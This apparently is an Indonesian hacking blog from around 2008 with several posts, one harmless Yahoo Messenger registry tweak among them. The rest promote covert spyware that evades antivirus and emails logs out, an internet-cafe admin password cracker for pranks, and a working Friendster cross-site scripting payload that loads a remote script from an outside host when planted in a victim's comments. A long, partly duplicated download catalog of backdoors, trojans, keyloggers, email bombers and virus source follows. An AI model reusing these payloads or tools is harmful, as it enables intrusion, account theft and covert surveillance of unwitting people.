ni dikit tutor bwt yg lom tw ajeee yeee
bwt yg udah tw, mending gak usah diliat deh.....
mang cara ini dah jadoel bgd...
tentu bro² 'n sis² smu dah pada tw ym.. sapa seh yg gak tw ym
normalnya kita kan cuma bisa login pake 1 ID, klu mo ganti login ID yg lain kitakan harus logout dulu ID yg udah di login....
nah, ni dia dikit trik biar bro 'n sis smua bisa login beberapa kali pake ID yg beda tanpa harus logout terlebih dahulu...
Caranya adalah sebagai berikut:
1. Jalankan registry editor dengan cara klik tombol Start - Run. Ketik regedit lalu tekan enter.
2. Masuk ke key HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.
3. Pada panel sebelah kanan, klik kanan dan pilih menu New - DWord Value.
4. Ketik Plural.
5. Klik 2x pada Plural dan isi dengan nilai 1 (satu).
6. Keluar dari registry editor.
sekian.... dan terima kasih..
Friday, May 30, 2008
007 Spy Software
007 Spy Software adalah salah satu spy program yang sangat komplit dan bagus. ga cuma kaya keyloger yang cuma ngopi tiap password yang di ketik pada keyboard, tetapi juga memiliki 4 fungsi pengendus lainnya, seperti Website Log, Application Log, Screenshot Log, File Folders Log. Untuk dapat menggunakannya, elu mesti install dulu, dan gw gak ngerti cara kerjanya, tetapi software ini bekerja behind process atau hidden proses atau menyembunyikan diri sehingga tidak terdetek oleh anti keylogger, anti virus maupun anti spyware.
Dan pada saat selesai installasi, yang perlu elu inget adalah, untuk membuka program ini, tekan tombol ctrl+alt+F7 untuk dapat mengakses dan melihat hasil spy. Satu hal lagi yang membuat program ini sempurna adalah, anda dapat mengirimkan hasil spy tersebut ke email anda. Untuk dapat menggunakan opsi ini, anda perlu melakukan pengaturan terlebih dahulu.
Download
Dan pada saat selesai installasi, yang perlu elu inget adalah, untuk membuka program ini, tekan tombol ctrl+alt+F7 untuk dapat mengakses dan melihat hasil spy. Satu hal lagi yang membuat program ini sempurna adalah, anda dapat mengirimkan hasil spy tersebut ke email anda. Untuk dapat menggunakan opsi ini, anda perlu melakukan pengaturan terlebih dahulu.
Download
Mencari Password Admin Dengan Admin Password Finder
kali ini gw mau kasih cara jail untuk mengetahui password admin, cocok banget ni buat yang mau iseng pas maen di warnet. cara nya juga sangat gampang, pada chart's area, ceklist aja semua kotaknya agar mendapatkan hasil yang maksimal, dan pada how many chart's for start search anda bisa pilih berapa jumlah karakter untuk memulai pencarian, kalo menurut gw sih isi 4 aja coz masa iye password admin cuman 3karakter Terus kalo passwordnya ada yg kejaring, anda tinggal ganti password tersebut dengan mengklik pada tombol switch to password changer.. Selamat mencoba, dan jail sedikit kan gpp, buat ngasih pelajaran untuk admin yang biasanya sok pinter :P
Download Disini
Hack FS Terbaru
Bikin blank FS orang (tinggal layout-nya doank yang keliatan). Pertama isi comment seperti biasa misal: "makasih ya dah di add". Abis tu tulis script yg aku kasih link dibawah ini :
nb = yg aku kasih tanda * = ganti dgn < trus yg gw kasih tanda ** = ganti dgn >
Taruh di comment FS target.
kalo mo taw antivirusnya silahkan panggil gw lewad YM kek, HP kek, terserah..
*img src='#' width='0' height='0' h='**' onerror='tamil="script";//
q="http://h1.ripway.com/krezeks/buat_coba/";//
w="sssst.txt";//
makkez=document.createElement(tamil);//
makkez.src=q+w;//
u=document.all.tags("head")[0];//
u.appendChild(makkez);//'
nb = yg aku kasih tanda * = ganti dgn < trus yg gw kasih tanda ** = ganti dgn >
Taruh di comment FS target.
kalo mo taw antivirusnya silahkan panggil gw lewad YM kek, HP kek, terserah..
Hacking ToolBox
Hacking Toolbox
Backdoor: Intrude computer and control the computer with client program.
Crack tool: Crack passwords of systems or applications, crack the serial numbers.
Disassembler: Disassemble the program with it. If you have a executable file, you can look the source code of this file with it.
DoS tool: Make computer stop to respond to any request with these tools, so other people can not access the computer.
Document: Documents about hacker, cracker, etc.
E-mail tool: Destroy the computer system using these tools, the tools are all related to e-mail. It includes several tools about e-mail, for example, email bomber, tool to find someone’s email address, etc.
Editor: Edit or modify your program with them.
Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.
Executable file tool: Manipulate executable files with these tools, bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.
ICQ tool: Destroy the computer system using these tools, the tools are all related to ICQ. All programs in it work with ICQ. With the tools, you can do many things, for example, recovering ICQ’s password, sharing your files, and encrypting your ICQ messages, and so on.
Keylogger: Record keystrokes when the program is running, so you can get some useful information, for example, password.
MISC: Examine source code for security holes, hack games, and other interesting tools for both linux and windows.
Packet forging: Modify the data packet on network at will.
Phreak tool: Test the paging transmitters and systems, and so on, it includes box and wardialier.
Scanner: Acquire the system information, for example, open ports, OS, and so on.
Sniffer: Intercept and capture the data on the network.
Snoop tool: Show information of your system. For example, it can show IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.
Source code: Source code of many tools.
Spoof: Bypass an HTTP proxy, keep your connection active, creates fake credit card numbers, ip spoof, etc.
Virus: Source code of virus and executable virus.
Backdoor
1. Back Orifice: Tools about back orifice.
2. Backdoor kit: Collection of many backdoor program.
3. Backdoor source: Source of backdoor program.
4. Minigift: Another backdoor program.
5. Net spy: Allow you to gain control of another computer using the internet.
6. Trojan: Control other people’s computer.
Crack tool
1. AMI Crack: Crack the Ami BIOS.
2. AMI Decoder: Crack the password of ami BIOS.
3. ARJ Cracker: Cracks password protected ARJ Files.
4. AW: Crack the password of BIOS.
5. Adv Office 2000 Password Recovery (pro): Crack the password.
6. Adv Office 2000 Password Recovery (std): Crack the password.
7. Advanced Archive Password Recovery: Crack the password of archive.
8. Advanced Excel 2000 Password Recovery: A program to recover lost or forgotten passwords to files/documents created in Microsoft Excel.
9. Advanced NT Security Explorer: An application for Windows NT/2000/XP system administrators for finding holes in system security.
10. Advanced Outlook Express Password Recovery: Crack the outlook express password.
11. Advanced PDF Password Recovery Pro: Crack the PDF password.
12. Advanced Word 2000 Password Recovery: Crack the password of word 2000.
13. Advanced ZIP Password Recovery: Crack the password of zip.
14. Ami BIOS cracker: Crack password of ami BIOS.
15. BIOS / CMOS tools: Crack the password of BIOS and CMOS.
16. CryptoExplorer for Borland Paradox: Recover Borland Paradox passwords.
17. Dictionary: Used by cracker to crack the password.
18. Dictionary Maker: Makes dictionary files for password crackers.
19. FBRUTE: Crack unix password.
20. Hades cracker: Crack the password.
21. John The Ripper: Crack unix password.
22. Kill CMOS ver 1.00: Crack the password of CMOS.
23. L0phtCrack 2.01: Recover passwords for Windows NT.
24. Lilo crack: Crack password of lilo.
25. Linux crack: Crack password on linux.
26. Lotus 1-2-3 Password Recovery Key: 1-2-3 Key is a program to recover passwords for Lotus 1-2-3 documents.
27. Lotus Word Pro Password Recovery Key: Recover Lotus Word Pro Password.
28. MS Access Password Detection: Crack password of MS Access.
29. Mac crack: Crack password on Mac.
30. MailPassword: Recover lost password of e-mail.
31. MakePwl: Create the PWL files.
32. NtPassword: Find holes in system security.
33. PGP Crack: Crack the PGP.
34. PWLCRACK: Crack the PWL files.
35. PalmCrack 1.1: The password testing tool for the Palm Computing Platform.
36. Passware Kit: Recover the password.
37. Password Recovery Tools: Recover some passwords.
38. Password dictionaries: Used by cracker to crack the password.
39. PwlTools: Recover login password.
40. Quicken Password Recovery Key: Recover password.
41. Register: Register the software.
42. RemPass Ver 2.6: Crack password of BIOS.
43. SERIALS 2000: Crack the register code.
44. Serial number: Used by cracker to crack s/n.
45. THC-CUPASS: Crack password of user on a WindowsNT/W2K server.
46. THC-PrintDates: Crack password using date.
47. Unix password crackers: Crack passwords for unix.
48. Windows crack: Crack password on windows.
49. Windows password crackers: Crack password on windows.
50. Word List: Word dictionary.
51. WordPerfect Password Recovery Key: Recover passwords for WordPerfect document files.
52. Wzippwd: Creates valid serial number for Winzip.
53. ZIP Cracker: Cracks ZIP Files that are password protected.
54. iMesh Password Recovery: Recover a password installed in the iMesh client.
55. variation tool: Prepare the word list used by cracker to crack password.
Disassembler
1. ASMGEN: A program to generate cross-referenced assembly language code from any executable file.
2. Bubble Chamber: Disassemble executable files.
3. DoDi’s Visual Basic Tools: DoDi is a VB kit.
4. PROVIEW: Analyze and view system.
5. Windows Disassembler: Disassembe Windows executables and dynamic link libraries.
DoS tool
1. Black: Bomb someone’s computer with it.
2. IGMP Nuker: Bomb other’s computer with this popular tool.
3. Windows DoS kit: Attack computer systems with this useful tools.
4. pagebomb: Bomb windows pager with this tool.
5. windows95/98 patch: Patch you system in order to avoid attack by hackers.
Document
1. Article about hack: Introduce some knowledge about hack.
2. Article about hacker: Tell you how to become a hacker.
3. Articles about DoS: Describe what is DoS attack.
4. Articles about crack: Teach you how to crack.
5. Articles about programming: Introduce some knowledge about programming.
6. Aticles about hack: Narrate some knowledge about hack.
7. Books about hacking: Narrate some knowledge about hacking.
8. Books about linux: Introduce information about linux.
9. Books about network: Tell you knowledge about network.
10. Books about programming: Introduce some knowledge about programming.
11. Document about jargon: Tell you some about jargon.
12. Document about pbx: Introduce some pbx knowledge.
13. Document about phreaking: Introduce knowledge about phreaking.
14. Other documents: Introduce you some information.
15. Phrack Documents: Discuss some questions about phrack.
16. The Trojans Removal Database: Describe a lot of Trojan programs.
E-mail tool
1. Anima: Bomb some others’ computers with this tool(e-mail bomber).
2. Anonymous emailer: Send e-mail without being recognized.
3. Bomber: Bomb someone’s e-mail box with it.
4. E-mail bomber kit: Bomb some e-mail box with these tools.
5. Euthanasia: Bomb other’s e-mail address with this tool.
6. Extreme mailer: Bomb some victim’s e-mail address with it.
7. Haktek: Use this program to attack your victim or protect yourself from being hacked.
8. KaBoom!: Bomb other’s e-mail box.
9. Mail Bomb: Bomb your victim by this e-mail bomber.
10. News Mail Agent: Find any e-mail address in news groups.
11. Quick Fyre: QuickFyre is an anonymous emailer mail bomber.
12. Stealth Mailer: Send bombs to other people with this tool.
13. Unabomb: Send people email bombs.
14. Web Mail Agent: Find any e-mail address in the internet.
Editor
1. HEXCALIBUR: Examining, modify or otherwise manipulate disk files in their raw, or binary format.
2. HEXpert for Windows: Edit windows multi-format binary files.
3. Hex Workshop: Edit, insert, delete, cut, copy, and paste hex to your files.
4. Hexedit: Edit your raw files.
5. Hiew: Dump NE-executable file and dump LE/LX-executable file.
6. Script Hack Wizard: Allow you to hack or modify many language scripts with ease.
7. Support Files: Add the necessary files that script hack wizard uses to run.
Encryption & decryption tool
1. Apocalypso: Crypto tool from HNC.
2. Cryptonite Pro: Uses a superfast 64 bit encryption algorithm on Windows 95/98/Me.
3. EasyFP: Performs file encryption to protect your files and folders from being read by others.
4. Encryption: Encrypt your system information by four tools.
5. Encryption tools: Collecting a huge munber of encryption and decryption tools.
6. Encryptonite: Encrypt and decrypt text file with it easily.
7. HTML Encrypt: Encrypt your HTML/Script program.
8. Macintosh Encryption: Include various Macintosh encryption tools.
9. NetMangler: Encrypt your emails and protect yourself with NetMangler.
10. PC-Encrypt: Compress and encrypt almost any type of file.
11. PGPfreeware: Protect your email form unauthorized view.
12. WebPassword: Protect your web pages with password.
13. WinSafe: Encrypt your files with some powerful algorithms.
Executable file tool
1. Bound File Detector & Remover: Detect bound file with this tool.
2. Exe file tool: Manage the exe files with these tools.
3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.
4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.
5. Newjoiner: Avoid av detection.
6. PEBundle: Allow for DLLs or other files to be ??bundled?? with an executable file.
7. Topo: Scan all sections in order to find large ‘usable’ areas.
8. WinSplit: Split and join files with this tool.
9. inPEct: Bind 2 executables in one.
10. inPEct source code: Bind 2 executables in one.
ICQ tool
1. Advanced ICQ Password Recovery: Recover passwords to ICQ accounts.
2. Aquila: Recover your passwords with it.
3. ICQ Document: There are two documents about ICQ.
4. ICQ File Share: Share your files over the internet with your online friends.
5. ICQ MachineGun: Attack victim computer by ICQ.
6. ICQ kit: Attack your victim with these tools.
7. ICQr Information: Read and reveal personal information stored in Mirabilis ICQ Database (.DAT) files.
8. PGP-ICQ: Encrypt your ICQ messages.
9. SecureICQ: Allow you to encrypt messages you send and to decrypt encrypted messages you receive.
10. Send It Agent: Send very large data in no time to the ICQ users.
11. Source code about ICQ: Snoop ICQ traffic for a set host.
Keylogger
1. G2kBIOSspoof: Spoof BIOS password for gateway pc’s simply.
2. HookThis: Set a systemwide keyboard-hook.
3. Hooker: Make intelligent trojan keylogger module.
4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.
5. KeyGhost: Record keystrokes with tiny module that clips on to PC keyboard cable.
6. KeySpy: Spy program as a keyboard logger and a PC remote controller.
7. KeyTrap: Log keyboard key effectively!.
8. Keycopy: Keep a record of any keyboard activity on your computer.
9. Keylog: Include keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.
10. PC Acme: Monitor activity on PC and saves all information in the LOG files.
11. PC Acme Pro: Monitor software on PC and saves all information in the LOG files.
12. Phantom2: Record and playback a keystroke program for MS-DOS.
13. Playback!: Record the complete task and then play it back with one keystroke.
14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.
15. Skin: Monitors kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.
16. Slog: Provide you with a log of what you have typed on your own computer for later review.
MISC
1. Game Hack: Having Game Wizard 32 and CrackAid, two tools.
2. HeadStrong WebClicker: Use public proxies to create artificial banner ad clicks.
3. Linux_misc: Collect many Linux misc tools with some source files as TCFS, SILC, DDNSF, St Jude, FreeVSD.
4. Misc: Include many misc of source codes and tools that can do such job as hijacking, monitoring, or interception, etc.
5. Quick Socket: Allow you administrator to chat (via keyboard) directly to a remote user also running Quick Socket.
6. Shutdown 2000: Disturb running application program.
7. Windows_misc: Contain all kinds of Windows misc tools, especially Wat, Stealth Proxy, Outlook Header Exp, WebClicker2.0, Ap2.74, etc.
Packet forging
1. Netcat: Reading and writing data utility across network connections using TCP or UDP protocol.
2. Packet_Forging: Include 21 files that are all used to create and send arbitrary packets on ethernet networks.
3. Packet_tool: Having other five packing tools as tcpkill, packetx1, msmh, LibnetNT, arpinject in the kit.
4. Pksnd102: Packing 16 files as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 in it, among which are packed or executable files and source files of packet driver programs.
5. Raw IP Packet Capture/Creation Utility: Allow you free reign to directly forge the packet in any way you so desire.
6. Snot: Use snort rules files as its source of packet information.
7. Winject: Inject packet for Windows 9x, also called drugs for Windows.
Phreak tool
1. Auto Dial: Help you to use a war dialer easily.
2. Blue Dial: Make it easy to create and use different frequency settings for dialing.
3. Boxtone: Create phone tones.
4. CATCALL: Deal out a sentence from mildly annoying to downright galling.
5. CHaoS DeViCe: Call random pagers, puts in a phone number, hangs up, and goes all over again.
6. CPhreak: It is the first fone phreaking utility.
7. Dialing Demon: Wardialer.
8. Grim Scanner: Search for dial tones and carriers in the same call.
9. No Carrier: Scan with Dos shell, graphics and more!.
10. POCSAG Decoder: Allow the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.
11. Pageit: Page a billion different pagers and put in one number, or Page ONE pager and put in a billion numbers!.
12. PhoneTag: Check for starttime every second while it’s running.
13. Phreak box: Construct and use phreak box.
14. Super Dial: Call all of your town (or cities) phone numbers.
15. THC-SCAN: Scan phone-number areas with your modem.
16. The Little Operator: It is another wardialer.
17. Tone Loc Utilities: It is also a wardialer.
18. ToneLoc: Dials numbers, looking for some kind of tone with it.
Scanner
1. 7th Dimension Port Scanner: Scan your port address more easily.
2. AB Complete Ping: Allow you to ping one or more IP addresses, to scan a network for shared resources and to scan a computer for open ports.
3. Angry IP Scanner: Scan IP very easily and rapidly!.
4. Dave’s Port Sniffer: Detect FTP, HTTP, POP, SMTP, TELNET and FINGER deamons running on any TCP host machine.
5. DeadBolt: Monitor holes in Windows and alert you when it detects suspicious activity, giving you the power to stop viruses dead in their tracks!.
6. Linux-Vuln-source: Carry the two scanner as Rnmap and VLAD ’s system security kit!.
7. MacAnalysis: Audit suite for your Macintosh to perform and help implement a security standard for your computer/network by performing some work.
8. NetBIOS Security Kit(unix): Perform various security checks on remote servers running NetBIOS file sharing services.
9. NetBIOS Security Kit(windows): Perform various security checks on remote servers running NetBIOS file sharing services.
10. Netmon: Monitor network connections.
11. Nmap: Explore or security audit network on Linux or Unix.
12. Port Invader: Scan a range or list of IP addresses to verify if there are open or closed ports.
13. Port Scanner: Scan a group of IP address looking for the presence of specific incoming TCP/IP ports.
14. PortScan: Scan port fast and configurably!.
15. Port_Scanner: Collet 20 tools to use in port sacanner on Linux or Unix!.
16. Portscan SMS Alert: Alert you when probed scandlogd logs information to syslog and invokes this shell script.
17. Scanner: Collect 84 tools and misc to scan.
18. SecureScan NX: Scan your distributed network architecture for vulnerabilities from one central location.
19. SkPortScan ActiveX Control: Integrate port-scanning capabilities into your applications with this ActiveX control.
20. THC-HappyBrowser: Check an NT-Server/Webserver for known vulnerabilities.
21. THC-Probe: Scan compilation for Linux.
22. THC-Scan: Automate tone, carrier, vmb scanning.
23. WhereIsIP: Find the geographic location of chat room members, ICQ members, and more.
24. Windows_Trojan_Scanner: Collect 6 little tools scanning whole networks to find well known Trojans.
25. Windows_port_scanner: Collect 9 Port Scanner running on Windows.
26. XSharez scanner: Scan, search and get specific resources for you.
Sniffer
1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.
2. Colasoft Application Protocol Sniffer & Analyzer: It is a TCP/IP Network Sniffer & Analyzer program based on Windows system.
3. Ethereal0814: Free network protocol analyzer’s another version.
4. Ethereal0817: Analyze network protocol, another version of Ethereal.
5. Ethereal0820: Analyze network protocol freely for Win32.
6. Libpcap062: Needed for capturing packet to you as the packet capture library, the latest release of Libpcap.
7. Linux_sniff_source: Contain 18 sniffer tools on Linux and some source files.
8. LittleBrother: Allow supervisors to accurately manage and measure internet and network resource usage.
9. NetProb32 Network Analyzer: Analyze, Monitor Traffic, and Generator Packet program.
10. PacketX: Integrate winpcap packet capture functionality with VB or any other programming environment supporting Microsoft ActiveX technology.
11. Phenoelit’s own security sniffer: Open a network interface for all packets and not only for these packets, which are send to this interface.
12. Proxy Workbench: It is a unique proxy server ideal for developers, trainers and security experts that displays its data in real-time.
13. Snarp: Allow the host to sniff the data from the wire.
14. Sniff-em: Base on a competively priced, performance minded Windows as a Network analyzer.
15. Sniffers: Having 34 files in it and among that are 28 sniffer tools and some source codes.
16. Socket Workbench: Designed to analyze socket communications.
17. Stealth Activity Recorder: Use newly and easily internet enabled tool for monitoring home and business PCs.
18. Tcpdump362: Capture and dumper program pretty much for the original protocol packet.
19. Windows_sniff: Facilitate the capture and visualization of network traffic kit of 5 tools and 1 source code files.
20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!.
Snoop tool
1. ID: Display the ID information of machine’s specific hardware.
2. IPQuery: Show the current IP Address.
3. NetroSnooper: Find hidden files on the internet!.
4. Network Inventory: Provide network administrators with the ability to perform a software inventory on all machines located on a network.
5. Quadsoft’s IP Tool: Tell you your IP Address in a variety of ways.
6. ShellSPY: Track every process running on your PC.
7. Trouble In Paradise: Install nothing but trouble your machine with some showing message.
8. iNetTools for Windows: Collect menu-driven testing tools for internet and IP-based networks.
Source code
1. APG: Set for random password generation.
2. ARP Monitor: Trace arp requests from/to your machine.
3. Asm: Including msmh, inpect, GetDialPasswords, it is a kit.
4. Backdoor: Includes 17 Backdoor tools in the kit with their source code.
5. Blue Beep: Blue Beep is a wardialer, this includes its source code.
6. C_SOURCE: Contain 4 files in it, and get the tools source code after decompress them.
7. Emailcrk: Crack password of e-mail account.
8. Findhost: Scan port on the net for you.
9. Harvester: Contain the source of Harvester, which monitors remote web pages and FTP directories.
10. IgmpNuke: Use IGMP packet tool’s source code.
11. Jail Chroot Project: Build a chrooted environment on POSIX with source code of C.
12. Keylogger_SRC: Include all the full source of Keylogger recording keystrokes.
13. Misc_src: Misc source code of 10 tools.
14. Network Grep: Mimick as much functionality in GNU grep as possible, applied at the network layer.
15. Nutcracker: Check/crack password tool for Unix/Linux.
16. PgpIcq: Encrypt your ICQ messages using the power of the world’s best encryption software.
17. Portscanner: Scan a group of IP address.
18. SecurityFocus ARIS Extractor: Analyze IDS log sophisticatedly and filter important attacks from the noise.
19. ShareDecryption: Extract share passwords from registry.
20. VB_SOURCE: Contain 14 files in it, and get the tools source code after decompress them.
21. Wnuke4: This is the complete wnuke4 source file package.
22. Zebedee: Secure IP tunnel tool’s source code!.
Spoof
1. Credit probe: Creates fake credit card numbers.
2. HTTPort: Establish a transparent TCP/IP tunnel through a proxy server.
3. IP Spoofer: Support IP spoofing software kit.
4. Ircgspoofer: Spoofer software on IRC Ghost.
5. Pinger: Trick your ISP into thinking you are always active.
Virus
1. Virus_exe: Including six most typical executable virus programs.
2. Virus_source: Containing many virus source codes in the package, this page will be devoted to Virii and Trojan’s, 89 files in all.
Download :
ganti formatnya dengan format .iso
Backdoor: Intrude computer and control the computer with client program.
Crack tool: Crack passwords of systems or applications, crack the serial numbers.
Disassembler: Disassemble the program with it. If you have a executable file, you can look the source code of this file with it.
DoS tool: Make computer stop to respond to any request with these tools, so other people can not access the computer.
Document: Documents about hacker, cracker, etc.
E-mail tool: Destroy the computer system using these tools, the tools are all related to e-mail. It includes several tools about e-mail, for example, email bomber, tool to find someone’s email address, etc.
Editor: Edit or modify your program with them.
Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.
Executable file tool: Manipulate executable files with these tools, bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.
ICQ tool: Destroy the computer system using these tools, the tools are all related to ICQ. All programs in it work with ICQ. With the tools, you can do many things, for example, recovering ICQ’s password, sharing your files, and encrypting your ICQ messages, and so on.
Keylogger: Record keystrokes when the program is running, so you can get some useful information, for example, password.
MISC: Examine source code for security holes, hack games, and other interesting tools for both linux and windows.
Packet forging: Modify the data packet on network at will.
Phreak tool: Test the paging transmitters and systems, and so on, it includes box and wardialier.
Scanner: Acquire the system information, for example, open ports, OS, and so on.
Sniffer: Intercept and capture the data on the network.
Snoop tool: Show information of your system. For example, it can show IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.
Source code: Source code of many tools.
Spoof: Bypass an HTTP proxy, keep your connection active, creates fake credit card numbers, ip spoof, etc.
Virus: Source code of virus and executable virus.
Backdoor
1. Back Orifice: Tools about back orifice.
2. Backdoor kit: Collection of many backdoor program.
3. Backdoor source: Source of backdoor program.
4. Minigift: Another backdoor program.
5. Net spy: Allow you to gain control of another computer using the internet.
6. Trojan: Control other people’s computer.
Crack tool
1. AMI Crack: Crack the Ami BIOS.
2. AMI Decoder: Crack the password of ami BIOS.
3. ARJ Cracker: Cracks password protected ARJ Files.
4. AW: Crack the password of BIOS.
5. Adv Office 2000 Password Recovery (pro): Crack the password.
6. Adv Office 2000 Password Recovery (std): Crack the password.
7. Advanced Archive Password Recovery: Crack the password of archive.
8. Advanced Excel 2000 Password Recovery: A program to recover lost or forgotten passwords to files/documents created in Microsoft Excel.
9. Advanced NT Security Explorer: An application for Windows NT/2000/XP system administrators for finding holes in system security.
10. Advanced Outlook Express Password Recovery: Crack the outlook express password.
11. Advanced PDF Password Recovery Pro: Crack the PDF password.
12. Advanced Word 2000 Password Recovery: Crack the password of word 2000.
13. Advanced ZIP Password Recovery: Crack the password of zip.
14. Ami BIOS cracker: Crack password of ami BIOS.
15. BIOS / CMOS tools: Crack the password of BIOS and CMOS.
16. CryptoExplorer for Borland Paradox: Recover Borland Paradox passwords.
17. Dictionary: Used by cracker to crack the password.
18. Dictionary Maker: Makes dictionary files for password crackers.
19. FBRUTE: Crack unix password.
20. Hades cracker: Crack the password.
21. John The Ripper: Crack unix password.
22. Kill CMOS ver 1.00: Crack the password of CMOS.
23. L0phtCrack 2.01: Recover passwords for Windows NT.
24. Lilo crack: Crack password of lilo.
25. Linux crack: Crack password on linux.
26. Lotus 1-2-3 Password Recovery Key: 1-2-3 Key is a program to recover passwords for Lotus 1-2-3 documents.
27. Lotus Word Pro Password Recovery Key: Recover Lotus Word Pro Password.
28. MS Access Password Detection: Crack password of MS Access.
29. Mac crack: Crack password on Mac.
30. MailPassword: Recover lost password of e-mail.
31. MakePwl: Create the PWL files.
32. NtPassword: Find holes in system security.
33. PGP Crack: Crack the PGP.
34. PWLCRACK: Crack the PWL files.
35. PalmCrack 1.1: The password testing tool for the Palm Computing Platform.
36. Passware Kit: Recover the password.
37. Password Recovery Tools: Recover some passwords.
38. Password dictionaries: Used by cracker to crack the password.
39. PwlTools: Recover login password.
40. Quicken Password Recovery Key: Recover password.
41. Register: Register the software.
42. RemPass Ver 2.6: Crack password of BIOS.
43. SERIALS 2000: Crack the register code.
44. Serial number: Used by cracker to crack s/n.
45. THC-CUPASS: Crack password of user on a WindowsNT/W2K server.
46. THC-PrintDates: Crack password using date.
47. Unix password crackers: Crack passwords for unix.
48. Windows crack: Crack password on windows.
49. Windows password crackers: Crack password on windows.
50. Word List: Word dictionary.
51. WordPerfect Password Recovery Key: Recover passwords for WordPerfect document files.
52. Wzippwd: Creates valid serial number for Winzip.
53. ZIP Cracker: Cracks ZIP Files that are password protected.
54. iMesh Password Recovery: Recover a password installed in the iMesh client.
55. variation tool: Prepare the word list used by cracker to crack password.
Disassembler
1. ASMGEN: A program to generate cross-referenced assembly language code from any executable file.
2. Bubble Chamber: Disassemble executable files.
3. DoDi’s Visual Basic Tools: DoDi is a VB kit.
4. PROVIEW: Analyze and view system.
5. Windows Disassembler: Disassembe Windows executables and dynamic link libraries.
DoS tool
1. Black: Bomb someone’s computer with it.
2. IGMP Nuker: Bomb other’s computer with this popular tool.
3. Windows DoS kit: Attack computer systems with this useful tools.
4. pagebomb: Bomb windows pager with this tool.
5. windows95/98 patch: Patch you system in order to avoid attack by hackers.
Document
1. Article about hack: Introduce some knowledge about hack.
2. Article about hacker: Tell you how to become a hacker.
3. Articles about DoS: Describe what is DoS attack.
4. Articles about crack: Teach you how to crack.
5. Articles about programming: Introduce some knowledge about programming.
6. Aticles about hack: Narrate some knowledge about hack.
7. Books about hacking: Narrate some knowledge about hacking.
8. Books about linux: Introduce information about linux.
9. Books about network: Tell you knowledge about network.
10. Books about programming: Introduce some knowledge about programming.
11. Document about jargon: Tell you some about jargon.
12. Document about pbx: Introduce some pbx knowledge.
13. Document about phreaking: Introduce knowledge about phreaking.
14. Other documents: Introduce you some information.
15. Phrack Documents: Discuss some questions about phrack.
16. The Trojans Removal Database: Describe a lot of Trojan programs.
E-mail tool
1. Anima: Bomb some others’ computers with this tool(e-mail bomber).
2. Anonymous emailer: Send e-mail without being recognized.
3. Bomber: Bomb someone’s e-mail box with it.
4. E-mail bomber kit: Bomb some e-mail box with these tools.
5. Euthanasia: Bomb other’s e-mail address with this tool.
6. Extreme mailer: Bomb some victim’s e-mail address with it.
7. Haktek: Use this program to attack your victim or protect yourself from being hacked.
8. KaBoom!: Bomb other’s e-mail box.
9. Mail Bomb: Bomb your victim by this e-mail bomber.
10. News Mail Agent: Find any e-mail address in news groups.
11. Quick Fyre: QuickFyre is an anonymous emailer mail bomber.
12. Stealth Mailer: Send bombs to other people with this tool.
13. Unabomb: Send people email bombs.
14. Web Mail Agent: Find any e-mail address in the internet.
Editor
1. HEXCALIBUR: Examining, modify or otherwise manipulate disk files in their raw, or binary format.
2. HEXpert for Windows: Edit windows multi-format binary files.
3. Hex Workshop: Edit, insert, delete, cut, copy, and paste hex to your files.
4. Hexedit: Edit your raw files.
5. Hiew: Dump NE-executable file and dump LE/LX-executable file.
6. Script Hack Wizard: Allow you to hack or modify many language scripts with ease.
7. Support Files: Add the necessary files that script hack wizard uses to run.
Encryption & decryption tool
1. Apocalypso: Crypto tool from HNC.
2. Cryptonite Pro: Uses a superfast 64 bit encryption algorithm on Windows 95/98/Me.
3. EasyFP: Performs file encryption to protect your files and folders from being read by others.
4. Encryption: Encrypt your system information by four tools.
5. Encryption tools: Collecting a huge munber of encryption and decryption tools.
6. Encryptonite: Encrypt and decrypt text file with it easily.
7. HTML Encrypt: Encrypt your HTML/Script program.
8. Macintosh Encryption: Include various Macintosh encryption tools.
9. NetMangler: Encrypt your emails and protect yourself with NetMangler.
10. PC-Encrypt: Compress and encrypt almost any type of file.
11. PGPfreeware: Protect your email form unauthorized view.
12. WebPassword: Protect your web pages with password.
13. WinSafe: Encrypt your files with some powerful algorithms.
Executable file tool
1. Bound File Detector & Remover: Detect bound file with this tool.
2. Exe file tool: Manage the exe files with these tools.
3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.
4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.
5. Newjoiner: Avoid av detection.
6. PEBundle: Allow for DLLs or other files to be ??bundled?? with an executable file.
7. Topo: Scan all sections in order to find large ‘usable’ areas.
8. WinSplit: Split and join files with this tool.
9. inPEct: Bind 2 executables in one.
10. inPEct source code: Bind 2 executables in one.
ICQ tool
1. Advanced ICQ Password Recovery: Recover passwords to ICQ accounts.
2. Aquila: Recover your passwords with it.
3. ICQ Document: There are two documents about ICQ.
4. ICQ File Share: Share your files over the internet with your online friends.
5. ICQ MachineGun: Attack victim computer by ICQ.
6. ICQ kit: Attack your victim with these tools.
7. ICQr Information: Read and reveal personal information stored in Mirabilis ICQ Database (.DAT) files.
8. PGP-ICQ: Encrypt your ICQ messages.
9. SecureICQ: Allow you to encrypt messages you send and to decrypt encrypted messages you receive.
10. Send It Agent: Send very large data in no time to the ICQ users.
11. Source code about ICQ: Snoop ICQ traffic for a set host.
Keylogger
1. G2kBIOSspoof: Spoof BIOS password for gateway pc’s simply.
2. HookThis: Set a systemwide keyboard-hook.
3. Hooker: Make intelligent trojan keylogger module.
4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.
5. KeyGhost: Record keystrokes with tiny module that clips on to PC keyboard cable.
